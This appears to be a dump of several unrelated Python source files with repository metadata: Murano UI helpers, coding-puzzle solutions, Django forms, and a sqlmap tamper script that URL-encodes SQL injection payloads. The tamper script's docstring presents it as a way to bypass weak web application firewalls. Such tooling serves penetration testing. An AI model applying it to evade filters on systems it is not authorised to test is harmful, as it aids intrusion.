glare = getattr(settings, 'MURANO_USE_GLARE', False)
if not glare:
return []
apps = api.muranoclient(request).packages.filter(inherits=fqn)
return apps
def app_by_fqn(request, fqn, catalog=True):
apps = api.muranoclient(request).packages.filter(fqn=fqn, catalog=catalog)
try:
return apps.next()
except StopIteration:
return None
def make_loader_cls():
class Loader(yaml.Loader):
pass
def yaql_constructor(loader, node):
value = loader.construct_scalar(node)
return yaql_expression.YaqlExpression(value)
# workaround for PyYAML bug: http://pyyaml.org/ticket/221
resolvers = {}
for k, v in yaml.Loader.yaml_implicit_resolvers.items():
resolvers[k] = v[:]
Loader.yaml_implicit_resolvers = resolvers
Loader.add_constructor(u'!yaql', yaql_constructor)
Loader.add_implicit_resolver(
u'!yaql', yaql_expression.YaqlExpression, None)
return Loader
# Here are cached some data calls to api; note that not every package attribute
# getter should be cached - only immutable ones could be safely cached. E.g.,
# it would be a mistake to cache Application Name because it is mutable and can
# be changed in Manage -> Packages while cache is immutable (i.e. it
# its contents are obtained from the api only the first time).
@cache.with_cache('ui', 'ui.yaml')
def get_app_ui(request, app_id):
return api.muranoclient(request).packages.get_ui(app_id, make_loader_cls())
@cache.with_cache('logo', 'logo.png')
def get_app_logo(request, app_id):
return api.muranoclient(request).packages.get_logo(app_id)
@cache.with_cache('supplier_logo', 'supplier_logo.png')
def get_app_supplier_logo(request, app_id):
return api.muranoclient(request).packages.get_supplier_logo(app_id)
@cache.with_cache('package_fqn')
def get_app_fqn(request, app_id):
package = api.muranoclient(request).packages.get(app_id)
return package.fully_qualified_name
@cache.with_cache('package_name')
def get_service_name(request, app_id):
package = api.muranoclient(request).packages.get(app_id)
return package.name
|
[
"[email protected]"
] | |
0f702ff15d1d5b9145082f6402c50e7a282d49a8
|
5b3d8b5c612c802fd846de63f86b57652d33f672
|
/Python/eight_kyu/make_negative.py
|
1ced2d2e37e6381d69e9df3fff51514a55f71b75
|
[
"Apache-2.0"
] |
permissive
|
Brokenshire/codewars-projects
|
1e591b57ed910a567f6c0423beb194fa7f8f693e
|
db9cd09618b8a7085b0d53ad76f73f9e249b9396
|
refs/heads/master
| 2021-07-22T18:50:25.847592 | 2021-01-25T23:27:17 | 2021-01-25T23:27:17 | 228,114,677 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 724 |
py
|
# Python solution for 'Return Negative' codewars question.
# Level: 8 kyu
# Tags: FUNDAMENTALS and NUMBERS.
# Author: Jack Brokenshire
# Date: 11/04/2020
import unittest
def make_negative(number):
"""
Make a given number negative.
:param number: an integer value.
:return: the integer as a negative number.
"""
return -abs(number)
class TestMakeNegative(unittest.TestCase):
"""Class to test make_negative function"""
def test_make_negative(self):
self.assertEqual(make_negative(42), -42)
self.assertEqual(make_negative(1), -1)
self.assertEqual(make_negative(-5), -5)
self.assertEqual(make_negative(0), 0)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
be5c1b5992e68428d06e14747e5ee74245b52472
|
58afefdde86346760bea40690b1675c6639c8b84
|
/leetcode/elimination-game/365996335.py
|
a8932065ba6959fe4df1131bf0761ece4fd6de2d
|
[] |
no_license
|
ausaki/data_structures_and_algorithms
|
aaa563f713cbab3c34a9465039d52b853f95548e
|
4f5f5124534bd4423356a5f5572b8a39b7828d80
|
refs/heads/master
| 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 311 |
py
|
# title: elimination-game
# detail: https://leetcode.com/submissions/detail/365996335/
# datetime: Mon Jul 13 18:50:53 2020
# runtime: 52 ms
# memory: 13.7 MB
class Solution:
def lastRemaining(self, n: int) -> int:
return (2 * (n // 2 - self.lastRemaining(n // 2) + 1)) if n > 1 else 1
|
[
"[email protected]"
] | |
1dc16a63a83e65662628b2453ff91ff337eff28d
|
3de21fc587c02f2702bd5770f11a31d5558a4666
|
/django_ac22/apps/avisos/forms.py
|
f0f90b51cfdad481b5d8887b01638b45daf0f108
|
[] |
no_license
|
juanros13/ac22
|
8c20d59de62d596a73d6d7190f551ef3accf2b8e
|
d8ecf0686f3d8a57a747503b231b46277db71a6e
|
refs/heads/master
| 2020-04-16T11:24:07.344404 | 2016-09-22T23:51:39 | 2016-09-22T23:51:39 | 65,859,654 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,110 |
py
|
# -*- encoding: utf-8 -*-
from django import forms
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth import authenticate
from django.forms.widgets import Select, Textarea
from apps.avisos.models import Aviso, ComentarioAviso
class AvisoAddForm(forms.ModelForm):
titulo = forms.CharField(
widget=forms.TextInput(
attrs={
'class': 'form-control',
'placeholder' : 'Ingresa el titulo del aviso',
}
),
label = "Titulo del aviso",
)
class Meta:
model = Aviso
fields = ('tipo','titulo', 'contenido','mantener_al_principio')
widgets = {
'contenido': Textarea(
attrs={
'class': 'form-control',
}
),
}
class ComentarioAddForm(forms.ModelForm):
class Meta:
model = ComentarioAviso
fields = ('comentario',)
widgets = {
'comentario': Textarea(
attrs={
'class': 'form-control',
}
),
}
|
[
"[email protected]"
] | |
7efb8ef9da9d77a2dea29542cdfeae246c6ad6d6
|
a2b6bc9bdd2bdbe5871edb613065dd2397175cb3
|
/Cookbook/Array/最小路径和.py
|
8fcbf61420a03b424278ab65480d35b31e907523
|
[] |
no_license
|
Asunqingwen/LeetCode
|
ed8d2043a31f86e9e256123439388d7d223269be
|
b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee
|
refs/heads/master
| 2022-09-26T01:46:59.790316 | 2022-09-01T08:20:37 | 2022-09-01T08:20:37 | 95,668,066 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,076 |
py
|
'''
给定一个包含非负整数的 m x n 网格 grid ,请找出一条从左上角到右下角的路径,使得路径上的数字总和为最小。
说明:每次只能向下或者向右移动一步。
示例 1:
输入:grid = [[1,3,1],[1,5,1],[4,2,1]]
输出:7
解释:因为路径 1→3→1→1→1 的总和最小。
示例 2:
输入:grid = [[1,2,3],[4,5,6]]
输出:12
提示:
m == grid.length
n == grid[i].length
1 <= m, n <= 200
0 <= grid[i][j] <= 100
'''
from typing import List
class Solution:
def minPathSum(self, grid: List[List[int]]) -> int:
row, col = len(grid), len(grid[0])
for r in range(1, row):
grid[r][0] += grid[r - 1][0]
for c in range(1, col):
grid[0][c] += grid[0][c - 1]
for r in range(1, row):
for c in range(1, col):
grid[r][c] += min(grid[r - 1][c], grid[r][c - 1])
return grid[-1][-1]
if __name__ == '__main__':
grid = [[1, 3, 1], [1, 5, 1], [4, 2, 1]]
sol = Solution()
print(sol.minPathSum(grid))
|
[
"[email protected]"
] | |
6ccaf0b7923ddbcf05dbd74de253ca863a8a52de
|
57db61160494659af43ee255d1e6ab2af6617114
|
/ultron-api/contact/admin.py
|
92b8324a11994ac12b4367be09b970e401577cbe
|
[] |
no_license
|
gloompi/ultron-studio
|
fc667d563467b386a8dec04a6079e7cdcfedc5a7
|
ec2ae8051644df2433b931c7e0228e75eaf20990
|
refs/heads/master
| 2023-06-25T19:22:45.119315 | 2019-12-08T05:53:02 | 2019-12-08T05:53:02 | 226,545,035 | 0 | 0 | null | 2023-06-10T00:22:15 | 2019-12-07T16:44:16 |
JavaScript
|
UTF-8
|
Python
| false | false | 205 |
py
|
from django.contrib import admin
from .models import Contact
class ContactAdmin(admin.ModelAdmin):
list_display = ('id', 'title')
# Register your models here.
admin.site.register(Contact, ContactAdmin)
|
[
"[email protected]"
] | |
aca820fb2f94f242539ff4b7b1b2ab02fbc5a555
|
148072ce210ca4754ea4a37d83057e2cf2fdc5a1
|
/src/core/w3af/w3af/plugins/attack/db/sqlmap/tamper/charencode.py
|
6d1a46727fed80594ad45d9e5cbf3e7aa2e118f8
|
[] |
no_license
|
ycc1746582381/webfuzzer
|
8d42fceb55c8682d6c18416b8e7b23f5e430c45f
|
0d9aa35c3218dc58f81c429cae0196e4c8b7d51b
|
refs/heads/master
| 2021-06-14T18:46:59.470232 | 2017-03-14T08:49:27 | 2017-03-14T08:49:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,491 |
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import string
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Url-encodes all characters in a given payload (not processing already
encoded)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[
i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
else:
retVal += '%%%.2X' % ord(payload[i])
i += 1
return retVal
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.